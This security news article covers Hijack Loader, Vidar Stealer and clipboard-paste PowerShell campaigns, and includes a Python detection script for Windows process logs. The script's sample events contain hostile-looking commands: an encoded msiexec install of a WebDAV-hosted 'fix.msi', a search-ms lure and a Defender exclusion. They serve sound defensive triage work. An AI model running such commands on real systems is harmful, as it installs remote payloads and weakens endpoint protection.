Hackers Use Free Software Lures to Deploy Hijack Loader and Vidar Stealer
Threat actors are luring unsuspecting users with free or pirated versions of commercial software to deliver a malicious loader named Hijack Loader, which in turn launches an information stealer known as Vidar Stealer.
“Adversaries had managed to trick users into downloading password-protected archive files containing trojanized copies of the Cisco Webex Meetings app (ptService.exe),” Trellix security researcher Ale Houspanossian said in an analysis published Monday.
“When unsuspecting victims unpacked and executed a ‘Setup.exe’ binary file, the Cisco Webex Meetings application stealthily loaded a malware loader, which led to the execution of an information-stealing module.”
The starting point is a RAR archive that contains an executable named “Setup.exe,” which is in fact a copy of Cisco Webex Meetings’ ptService module.
What makes the campaign stand out is its use of DLL side-loading to stealthily launch Hijack Loader (also known as DOILoader or IDAT Loader): the legitimate ptService binary resolves one of its DLL dependencies by name from its own directory, so the attacker-supplied DLL shipped alongside it in the archive is loaded instead of the real one. The loader then acts as a conduit to drop Vidar Stealer by means of an AutoIt script.
“The malware uses a known technique to bypass User Account Control (UAC) and exploit the CMSTPLUA COM interface for privilege escalation,” Houspanossian noted. “Following successful privilege escalation, the malware added itself to Windows Defender’s exclusion list to evade defenses.”
Besides using Vidar Stealer to siphon sensitive credentials from web browsers, the attack chain delivers additional payloads to launch a cryptocurrency miner on the compromised host.
The disclosure follows a surge in ClearFake campaigns that lure site visitors into manually running a PowerShell script to fix a supposed problem with viewing web pages, a tactic first documented by ReliaQuest at the end of last month.
The PowerShell script then serves as a springboard for Hijack Loader, which ultimately delivers the Lumma Stealer malware. The stealer is also configured to fetch three additional payloads: Amadey Loader, a downloader that launches the XMRig miner, and a clipper that redirects cryptocurrency transactions to attacker-controlled wallets.
“Amadey was observed downloading other payloads, such as a Go-based malware believed to be JaskaGO,” Proofpoint researchers Tommy Madjar, Dusty Miller, and Selena Larson said.
The enterprise security firm also identified in mid-April 2024 another activity cluster, dubbed ClickFix, that used fake browser update lures on compromised websites to distribute Vidar Stealer through a similar mechanism that involves copying and running PowerShell code.
Another threat actor that has adopted the same social engineering technique in its malspam campaigns is TA571, which has been observed sending emails with HTML attachments that, when opened, display an error message: “The ‘Word Online’ extension is not installed in your browser.”
The message also offers two options, “How to fix” and “Auto-fix.” If a target chooses the first option, a Base64-encoded PowerShell command is copied to the clipboard, followed by instructions to open a PowerShell terminal and right-click the console window, which pastes the clipboard content and runs it; the code in turn executes either an MSI installer or a Visual Basic Script (VBS).
Similarly, users who choose “Auto-fix” are shown WebDAV-hosted files named “fix.msi” or “fix.vbs” in Windows Explorer, by abusing the “search-ms:” protocol handler.
Regardless of the path taken, running the MSI file installs Matanbuchus, while running the VBS file leads to the execution of DarkGate.
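Because the pasted command never exists as a file on disk, the most reliable endpoint-side evidence of both TA571 paths, and of the Defender-exclusion step quoted from the Trellix analysis above, is the process command line recorded by Sysmon Event ID 1 or Windows event 4688. The following Python triage script is an added example written for this page (it is not Proofpoint's, Trellix's or any vendor's code): it decodes the `-EncodedCommand` argument (Base64 over UTF-16LE), then checks the raw and decoded text for the `search-ms:` handler, WebDAV UNC paths, the `fix.msi`/`fix.vbs` lure names, remote MSI/VBS execution and `Add-MpPreference -ExclusionPath`. The sample log lines, the host name `example-webdav.invalid` and the exact shape of the `search-ms:` URI are constructed assumptions, and the regexes are this example's approximations rather than vendor signatures.

```python
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
# -enc, ...); the argument is Base64 over the UTF-16LE bytes of the script.
_ENC_PREFIXES = ["ncodedcommand"[:i] for i in range(len("ncodedcommand"), 0, -1)] + ["c"]
ENC_ARG = re.compile(r"-e(?:" + "|".join(_ENC_PREFIXES) + r")?\s+([A-Za-z0-9+/=]{16,})", re.I)

# Indicators drawn from the chains described in the article. The patterns are
# this example's own approximations (assumption), not vendor signatures.
INDICATORS = {
    "search-ms handler": re.compile(r"search-ms:", re.I),
    "webdav path": re.compile(
        r"\\\\[\w.-]+(?:@(?:ssl@)?\d+)?\\DavWWWRoot|\\\\[\w.-]+@(?:80|443|SSL)\b", re.I),
    "fix.msi/fix.vbs lure": re.compile(r"\bfix\.(?:msi|vbs)\b", re.I),
    "remote msi/vbs execution": re.compile(
        r"msiexec(?:\.exe)?\s.*(?:https?://|\\\\)|[cw]script(?:\.exe)?\s.*\\\\.*\.vbs", re.I),
    "download-and-execute": re.compile(
        r"(?:DownloadString|Invoke-WebRequest|\biwr\b|\bcurl\b).*\b(?:iex|Invoke-Expression)\b"
        r"|\b(?:iex|Invoke-Expression)\b.*(?:DownloadString|Invoke-WebRequest|\biwr\b)",
        re.I | re.S),
    "defender exclusion": re.compile(r"Add-MpPreference\b.*-Exclusion", re.I),
}


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or invalid."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def triage(cmdline):
    """Match indicators against the raw command line plus its decoded payload."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = [name for name, rx in INDICATORS.items() if rx.search(haystack)]
    return {"decoded": decoded, "hits": hits}


def triage_events(events):
    """Return (index, hits) for every event that matches at least one indicator."""
    return [(i, triage(ev)["hits"]) for i, ev in enumerate(events) if triage(ev)["hits"]]


def _enc(script):
    """Encode a script the way powershell.exe -EncodedCommand expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample process-creation command lines (not real telemetry).
SAMPLE_EVENTS = [
    # 0: benign administrative use of -EncodedCommand
    "powershell.exe -NoProfile -enc " + _enc("Get-Service | Where-Object Status -eq 'Running'"),
    # 1: "How to fix" path: pasted encoded command that runs a WebDAV-hosted MSI
    "powershell.exe -w hidden -ep bypass -enc "
    + _enc("msiexec /i \\\\example-webdav.invalid@80\\DavWWWRoot\\fix.msi /qn"),
    # 2: "Auto-fix" path: Explorer opened through the search-ms: handler (assumed URI shape)
    'explorer.exe "search-ms:query=fix&crumb=location:\\\\example-webdav.invalid@SSL@443\\DavWWWRoot"',
    # 3: post-escalation Defender exclusion, as described in the Trellix analysis
    "powershell.exe -Command Add-MpPreference -ExclusionPath 'C:\\Users\\Public\\'",
    # 4: ordinary local installer, should not fire
    "msiexec.exe /i C:\\Users\\alice\\Downloads\\example-app.msi",
]

if __name__ == "__main__":
    for idx, hits in triage_events(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)}")
```

The decode step matters more than any single regex: the "How to fix" command is opaque in the raw event, and only the UTF-16LE decode exposes the `msiexec` invocation, the WebDAV path and the `fix.msi` name. In production the same logic would run over the command-line field of Sysmon or 4688 events, and a hit on the Defender-exclusion rule should be treated as post-compromise rather than as a lure indicator.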
Other variants of the campaign have also led to the distribution of NetSupport RAT, underscoring efforts to vary and refine the lures and attack chains, even though success requires substantial manual interaction from the victim.
“The legitimate use, and the many ways to store the malicious code, and the fact that the victim manually executes the malicious code without any direct association with a file, make detection of these types of threats difficult,” Proofpoint said.
“Since antivirus programs and EDRs may have trouble inspecting clipboard content, detection and prevention measures must be in place before the malicious HTML/site is presented to the victim.”
The development also comes as eSentire disclosed a malicious campaign that uses fake websites impersonating Indeed[.]com to deploy the SolarMarker information-stealing malware via a lure document that purports to offer team-building tips.
“SolarMarker uses search engine optimization (SEO) manipulation tactics to influence search engine results and boost the visibility of deceptive links,” the Canadian cybersecurity firm said.
“The attackers’ use of SEO strategies to steer users to malicious sites underscores the importance of being wary of clicking on search engine results, even if they appear legitimate.”